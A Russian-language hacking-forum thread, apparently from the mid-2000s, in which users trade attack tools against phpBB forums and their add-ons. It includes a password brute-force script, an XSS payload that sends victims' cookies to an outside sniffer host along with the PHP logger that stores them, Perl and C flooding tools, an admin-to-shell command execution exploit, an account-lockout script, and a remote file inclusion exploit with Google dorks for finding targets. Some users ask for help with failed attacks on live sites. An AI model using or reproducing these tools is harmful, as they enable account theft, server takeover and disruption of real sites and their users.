Уязвимости: phpBB

[n1†R0x]

Программа: phpBB 2.0.17

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в загружаемых аватарах. Удаленный пользователь может создать графический файл с расширением, не соответствующим типу изображения (например, GIF вместо JPG), внедрить в него произвольный HTML код и выполнить его в браузере жертвы в контексте безопасности уязвимого сайта.

Пример/Эксплоит: см. источник сообщения.

URL производителя: www.phpbb.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник: * phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit

 

[Winux]

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения и выполнить произвольный PHP код на целевой системе.

1. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре error_msg сценария usercp_register.php, параметре 'forward_page' сценария login.php и параметре 'list_cat' сценария search.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

2. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре 'signature_bbcode_uid' сценария usercp_register.php и может быть эксплуатирована посредством вставки произвольных выражений типа 'field=xxx' в запрос. Уязвимость существует при выключенной опции magic_quotes_gpc.

3. Уязвимость обнаружена при обработке входных данных в параметре 'signature_bbcode_uid' сценария usercp_register.php. Удаленный пользователь может изменить значения, которые передаются в функцию preg_replace() и выполнить произвольный PHP код на целевой системе.

 

[..o.o]

Уязвимость существует при обработке входных данных во время публикации сообщения. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

<B C=">" onmouseover="[code]" X="<B "> H E L O </B>

Для успешной эксплуатации уязвимости опция "Allow HTML" должна быть включена (по умолчанию отключена).

 

[durito]

а можно последний топик подробнее

 

[..o.o]

This exploit is Coded by DarkFig

Usage: brutephpbb.pl <host> <path> <port> <pass_file> <username> <logfile>

C:\:brutephpbb.pl www.target.ru /phpBB2/ 80 dictionnary.txt admin result.txt

#!/usr/bin/perl 
############################################ 
#--------------------------Hack Private Version property------------------------- 
#Credits:                        Weakness and Xploit by DarkFig 
#Affected products:     All PhpBB versions <= 2.0.18 
#Type:                            Dictionnary attack 
#Solutions:                    None official , but many solutions are possible;) 
#Note:                           Not yet revealed | If a line of the dictionnary file contain no data => "End of the password file" 
#For:                             Hack Private Version       
#------------------------------------------------------------------------------------------------ 
############################################ 
use IO::Socket; 

#--------------Utilisation--------------# 
if(@ARGV != 6){ 
print " 
+---------------------------------------------------------------------------------+ 
+--------------------PhpBB <= 2.0.18 Passwd Dictionnary Attack--------------------+ 
+-----------------------By DarkFig for Hack Private Version-----------------------+ 
+---------------------------------------------------------------------------------+ 
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    + 
+---------------------------------------------------------------------------------+ 
+ <host>        => The host where PhpBB is installed        |   [Ex: site.com]    + 
+ <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     + 
+ <port>        => PhpBB board port                         |   [Default is 80]   + 
+ <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    + 
+ <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] + 
+ <file_result> => File you want to log activity            |   [Ex: results.txt] + 
+---------------------------------------------------------------------------------+ 
";exit();} 

#--------------Data--------------# 
$host       = $ARGV[0]; 
$path       = $ARGV[1]; 
$full       = "$host"."$path"; 
$port       = $ARGV[2]; 
$pass_file  = $ARGV[3]; 
$username   = $ARGV[4]; 
$fileresult = $ARGV[5]; 
$OK         = 0; 
$referer    = "http://"."$host"."$path"."login.php?redirect="; 
$postit     = "$path"."login.php"; 

#--------------Hello world-----------------# 
print " 
+---------------------------------------------------------+ 
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
+---------------------------------------------------------+ 
       [+] Username             | $username 
       [+] Dictionnary file     | $pass_file 
       [+] Attack log           | $fileresult 
+---------------------------------------------------------+"; 

#--------------Password file--------------# 
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n"); 
chomp(@passdico = <FILE>); 
$nligne = "0"; 
while ($OK ne 1) { 
$passwordz  = "$passdico[$nligne]"; 
$request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion"; 
$length     = length $request; 
if ($passwordz eq ""){print "\n[-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();} 

#--------------Sending data--------------# 
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed..."; 
print $send "POST $postit HTTP/1.1\n"; 
print $send "Host: $host\n"; 
print $send "Content-Type: application/x-www-form-urlencoded\n"; 
print $send "Content-Length: $length\n\n"; 
print $send "$request\n"; 
read $send, $answer, 15; 
close($send); 

#-------------Success--------------------------------------------# 
if ($answer =~ /HTTP\/(.*?) 302/) { 
$OK = 1; 
print " 
       [-] Trying the password "."$passwordz 
       [+] User:     $username 
       [+] Password: $passwordz 
+---------------------------------------------------------+\n"; 
open results, ">$fileresult"; 
print results " 
+---------------------------------------------------------+ 
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig + 
+---------------------------------------------------------+ 
    [+] PhpBB board               | $full 
   [+] Board's port              | $port 
   [+] Username                  | $username 
   [+] Dictionnary file          | $pass_file 
    [+] Number of test            | $nligne 
    [+] Password found            | $passwordz 
+---------------------------------------------------------+\n"; 
close(FILE);close(results);exit();} 

#-------------Failed--------------------------------------------# 
if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nlign

 

[..o.o]

phpBB <= 2.0.17 remote command execution exploit
сплоит

 

[DISA]

Люди: а 2.0.18 возможно взломать?

Подскажите пожалуйста. Мне хотябы MP5 ХЕШ угнать =))))

 

[Great]

DISA
оффтоп. тебе, вероятно, сюда

 

[Winux]

phpBB 2.0.18 XSS Cookie Disclosure Exp.

/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- 'the html is on exploit'

original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
	-- http://securityreason.com/securityalert/269/
proof of concept by: jet
	-- http://jet.carbon-4.net/
	
  develop a pure, lucid mind, not 
  depending upon sound, flavor,
  touch, odor, or any quality.
    - the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src=
'http://xss.pro/sources/sniff/sniff.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
/**Выровнять в 1 строку 2 предидущих. Не влезло.
c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>

# milw0rm.com [2005-12-21]

© milw0rm

 

[Winux]

Phpbb 2.0.19 Html Allowed XSS

Если разрешен HTML, то можно осуществить XSS:

<B C='>' onmouseover='alert("h4cky0u.org")' X='<B '> xss.pro/ </B>

 

[Winux]

phpBB <= 2.0.15 Register Multiple Users

Форум флудится новми акками и вгоняет сервер серъезную нагрузку. Кроме того, удаление бессмысленых акков заставить юзеров помудится.

Перл-реализация:

#!/usr/bin/perl 
##  Name: NsT-phpBBDoS (Perl Version) 
##  Copyright: Neo Security Team 
##  Author: HaCkZaTaN 
##  Ported: g30rg3_x 
##  Date: 20/06/05 
##  Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x 
##               A Simple phpBB Registration And Search DoS Flooder. 
## 
##  g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl 
##  [+] 
##  [+] NsT-phpBBDoS v0.2 by HaCkZaTaN 
##  [+] ported to Perl By g30rg3_x 
##  [+] Neo Security Team 
##  [+] 
##  [+] Host |without http://www.| victimshost.com 
##  [+] Path |example. /phpBB2/ or /| /phpBB2/ 
##  [+] Flood Type |1=Registration 2=Search| 1 
##  [+] .......................................................... 
##  [+] .......................................................... 
##  [+] .......................................................... 
##  [+] .............................................. 
##  [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed 
##  g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" 

use IO::Socket; 

## Initialized X 
$x = 0; 

## Flood Variables Provided By User 
print q( 
NsT-phpBBDoS v0.2 by HaCkZaTaN 
ported to Perl By g30rg3_x 
Neo Security Team 

); 
print q(Host |without http://www.| ); 
$host = <STDIN>; 
chop ($host); 

print q(Path |example. /phpBB2/ or /| ); 
$pth = <STDIN>; 
chop ($pth); 

print q(Flood Type |1 = Registration, 2 = Search| ); 
$type = <STDIN>; 
chop ($type); 

## If Type Is Equals To 1 or Registration 
if($type == 1){ 

## User Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) 
{ 

## Building User in base X 
$uname = "username=NsT__" . "$x"; 

## Building User Mail in base X 
$umail = "&email=NsT__" . "$x"; 

## Final String to Send 
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=
&location=&occupation=&interests=&signature=&viewemail=0&SPOILERonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode
=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; 
##  3 предидущие строки в 1 выровнять


## Posit Length 
$lrg = length $postit; 

## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 

## Print a "." for every loop 
syswrite STDOUT, "."; 

## Increment X in One for every Loop 
$x++; 
} 

## If Type Is Equals To 2 or Search 
} 
elsif ($type == 2){ 

## User Search Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) 
{ 
## Final Search String to Send 
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=
-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; 
##  2 предидущие строки вровнять в 1


## Posit Length 
$lrg = length $postit; 

## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 

## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums 
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 

## Print a "." for every loop 
syswrite STDOUT, "."; 

## Increment X in One for every Loop 
$x++; 
} 
}else{ 
## STF??? What Do You Type 
   die "Option not Allowed O_o???\n"; 
}

C реализация:

/* 
-------------------------------------------------------- 
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 
-------------------------------------------------------- 
Program:  phpBB 2.0.15 
Homepage:  http://www.phpbb.com 
Vulnerable Versions: phpBB 2.0.15 & Lower versions 
Risk: High Risk!! 
Impact: Multiple DoS Vulnerabilities. 

    -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==- 
--------------------------------------------------------- 

- Description 
--------------------------------------------------------- 
phpBB is a high powered, fully scalable, and highly customizable 
Open Source bulletin board package. phpBB has a user-friendly 
interface, simple and straightforward administration panel, and 
helpful FAQ. Based on the powerful PHP server language and your 
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
phpBB is the ideal free community solution for all web sites. 

- Tested 
--------------------------------------------------------- 
localhost & many forums 

- Explotation 
--------------------------------------------------------- 
profile.php << By registering as many users as you can. 
search.php  << by searching in a way that the db couln't observe it. 

- Exploit 
--------------------------------------------------------- 
[C Source] 
/* 
  Name: NsT-phpBBDoS 
  Copyright: NeoSecurityteam 
  Author: HaCkZaTaN 
  Date: 19/06/05 
  Description: xD You must figure out the problem xD 
  
  root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c 
  root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS 
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS 
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN 
  [+] NeoSecurityTeam 
  [+] Dos has begun....[+] 
  
  [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host> 
  [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com 
  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com 
  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN 
  [+] NeoSecurityTeam 
  [+] Dos has begun....[+] 
  
  ................................. 
  root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" 
  root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE 
  MACHTYPE=i486-slackware-linux-gnu 
  root@NeoSecurity:/home/hackzatan# 

*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <errno.h> 
#ifdef WIN32 
#include <winsock2.h> 
#pragma comment(lib, "ws2_32") 
#pragma pack(1) 
#define WIN32_LEAN_AND_MEAN 
#else 
#include <unistd.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#endif 

#define __USE_GNU 
#define _XOPEN_SOURCE 

int Connection(char *, int); 
void Write_In(int , char *, char *a, char *, int); 
char Use(char *); 

int main(int argc, char *argv[]) 
{ 
    int sock, x = 0; 
    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; 

    puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN"); 
    puts("[+] NeoSecurityTeam"); 
    puts("[+] Dos has begun....[+]\n"); 
    fflush(stdout); 

    if(argc != 4) Use(argv[0]); 

    while(1) 
    { 
           sock = Connection(Host,80); 
           Write_In(sock, Path, Pro_Sea, Host, x); 
           #ifndef WIN32 
           shutdown(sock, SHUT_WR); 
           close(sock); 
           #else 
           closesocket(sock); 
           WSACleanup(); 
           #endif 
           Pro_Sea = argv[2]; 
           x++; 
    } 
    //I don't think that it will get here =) 

    return 0; 
} 

int Connection(char *Host, int Port) 
{ 
        #ifndef WIN32 
        #define SOCKET int 
        #else 
        int error; 
        WSADATA wsadata; 
        error = WSAStartup(MAKEWORD(2, 2), &wsadata); 

        if (error == SOCKET_ERROR) 
        { 
                  perror("Could Not Start Up Winsock!\n"); 
                  return; 
        } 

        #endif 

        SOCKET sockfd; 
        struct sockaddr_in sin; 
        struct in_addr  *myaddr; 
        struct hostent *h; 
        
        if(Port <= 0 || Port > 65535) 
         { 
                  puts("[-] Invalid Port Number\n"); 
                  fflush(stdout); 
                  exit(-1); 
         } 
        
        if((sockfd =  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) 
        { 
                    perror("socket() "); 
                    fflush (stdout); 
                    exit(-1); 
        } 

        if(isalpha(Host[0])) 
        { 
           if((h = gethostbyname(Host)) == NULL) 
           { 
                     perror("gethostbyname() "); 
                     fflush (stdout); 
                     exit(-1); 
           } 
        } 
        else 
        { 
              myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); 
              myaddr->s_addr=inet_addr(Host); 
              
              if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) 
              { 
                     perror("gethostbyaddr() "); 
                     fflush (stdout); 
                     exit(-1); 
              } 
        } 

        memset(&sin, 0, sizeof(sin)); 
        sin.sin_family = AF_INET; 
        sin.sin_port = htons(Port); 
        memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); 

        if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) 
        { 
                     perror("connect() "); 
                     exit (-1); 
        } 

        return sockfd; 
} 

void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) 
{ 
    char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); 
    char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n" 
                 "Accept: */*\r\n" 
                 "Accept-Language: en-us\r\n" 
                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" 
                 "Accept encoding: gzip,deflate\r\n" 
                 "Keep-Alive: 300\r\n" 
                 "Proxy-Connection: keep-alive\r\n" 
                 "Content-Type: application/x-www-form-urlencoded\r\n" 
                 "Cache-Control: no-cache\r\n" 
                 "Pragma: no-cache\r\n"; 
    char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=
&interests=&signature=&viewemail=0&SPOILERonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=
1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
/*   Выравниваем 3 предидущие строки в 1 */ 
 
    char *Search  = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=
all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n"; 
/*   выровнять 2 строки в 1 */ 


    if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile); 
    else if(strcmp("search.php", Pro_Sea) == 0) 
    { 
               Pro_Sea = "search.php?mode=results"; 
               sprintf(str1, "search_keywords=Hack%d%s", x, Search); 
    } 
    else 
    { 
               puts("Sorry. Try making the right choice"); 
               exit(-1); 
    } 

    sprintf(str2, "POST %s%s HTTP/1.1\r\n" 
                  "Host: %s\r\n" 
                  "Referer: http://%s/\r\n%s" 
                  "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1); 
          
    write(sock, str2, strlen(str2)); 
    write(1, ".", 1); 
    fflush(stdout); 
} 

char Use(char *program) 
{ 
   fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program); 
   fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program); 
   fflush(stdout); 
   exit(-1); 
} 

/* 

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ 
'@@@@@''@@'@@@''''''''@@''@@@''@@ 
'@@'@@@@@@''@@@@@@@@@'''''@@@ 
'@@'''@@@@'''''''''@@@''''@@@ 
@@@@''''@@'@@@@@@@@@@''''@@@@@ 

*/

 

[Ŧ1LAN]

phpBB DoS

http://rapidshare.de/files/16200827/phpBB_DoS.rar.html

Password:

Спойлер: 15

WWW.THE-DIGITAL-UNDERGROUND.COM

 

[Ŧ1LAN]

phpBB admin2exec commands execution exploit version 2
Программа: phpBB 2.0.19 и боее ранние версии
описание:
эксплоит использует уязвимость в user_sig_bbcode_uid. Работает удаленно.
Написан на перле
Эксплоит:

#!/usr/bin/perl

## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
## version 2 (based on user_sig_bbcode_uid bug)
## tested on 2.0.12 , 2.0.13 , 2.0.19
## --------------------------------------------
## screen
## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
## Command for execute or 'exit' for exit # id
## uid=80(www) gid=80(www) groups=80(www)
## Command for execute or 'exit' for exit # exit 
## --------------------------------------------
## *** surprise included;)
## 20/02/06 
## 1dt.w0lf
## RST/GHC (http://rst.void.ru , http://ghc.ru)

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:o:");

$url      = $opt_u;
$login    = $opt_L;
$password = $opt_P;
$id       = $opt_i || 2;
$prefix   = $opt_p || 'phpbb_';
$proxy    = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
 $res = $xpl->post($url.'login.php',
 [
 "username"   => "$login",
 "password"   => "$password",
 "autologin"  => "on",
 "admin"      => "1",
 "login"      => "Log in",
 ],"User-Agent" => "$ids");
 $cookie_jar->extract_cookies($res);
 if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }   
 $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
 while ()
 {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub run($)
 {   
 $sql   = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
 &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);   
 $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
 @result = split(/\n/,$res->content);
 $data = '';
 $on = $start = $end = 0;
 for (@result)
  {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; } 
  }
 if($start&&$end) { print $data."\r\n"; } 
 }
 
sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]", 
Content_type => 'form-data',
Content      => [ 
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [ 
                                   undef,
                                   '0wneeeeedddd', 
                                   Content_type => 'text/plain',
                                   Content => "$_[1]", 
                                 ],
                ]
,"User-Agent" => "$ids");
} 

sub usage()
 {
 &about();
 print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
 print " Options:\r\n";
 print " -u [URL] - path to forum e.g. http://site/forum/\r\n";
 print " -L [login] - admin login\r\n";
 print " -P [password] - admin password\r\n";
 print " -i [id] - admin id (optional, default 2)\r\n";
 print " -p [prefix] - table prefix (optional, default phpbb_)\r\n";
 print " -o [host:port] - proxy (optional)\r\n";
 exit();
 }
 
sub about()
  { 
  print "\\=-----------------------------------=/\r\n";
  print "| phpBB admin2exec exploit by RST/GHC |\r\n";
  print "| version 2 (user_sig_bbcode_uid)     |\r\n";
  print "/=-----------------------------------=\\\r\n";
  return 'http://rst.void.ru';
  }

Источник: rst.void.ru

 

[RedDevil]

Программа: phpbb-Auction (модуль для phpBB) 1.3m, возможно другие версии.
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии "auction/auction_common.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.
Пример:

http://[target]/[path]/aution\auction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

[mod][Ŧ1LAN:] ещё раз, тупо, не редактируя, скопипастишь с секлабы получишь минус.[/mod]

 

[Winux]

phpBB 2.0.20 Disable Admin or User Account

###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
";

}}

 

[Ŧ1LAN]

phpbb-auction remote file inclusion
запрос в google : "Powered by phpBB" inurl:auction.php

пример/эксплоит:

/[path]/auction/auction_common.php?phpbb_root_path=http://evil

 

[Ŧ1LAN]

Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
а вот и эксплоит...

#!/usr/bin/perl
##
#phpBB auction mod - Remote File Inclusion Vuln
# Bug discovered by VietMafia
# code copier: webDEViL w3bd3vil[at]gmail.com
#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
# dork: intext:"phpbb - auction" inurl:"auction"
# usage:
# perl wb1.pl <target> <cmd shell location> <cmd shell variable>
# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
      print "[shell] \$";
while(<STDIN>)
      {
              $cmd=$_;
              chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; 


$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

{
      $finreturn = $1;
      $finreturn=~ tr/[ê]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print "  phpBB auction mod - Remote File Inclusion Vuln\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
 print "============================================================================\r\n";
 exit();
 }

 

[RedDevil]

Что-то не получеться...
Народ, если кто знает, в чём у меня ошибка:
Ввожу
http://www.*****.com/auction/auction_commo...t.txt&cmd=ls&z=
или
http://www.*****.com/auction/auction_commo...vilt.txt&cmd=ls

Выдает:
Warning: main(http://mysite.com/evilt.txtextension.inc): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/*****/public_html/auction/auction_common.php on line 26

Warning: main(): Failed opening 'http://mysite.com/evilt.txtextension.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/*****/public_html/auction/auction_common.php on line 26

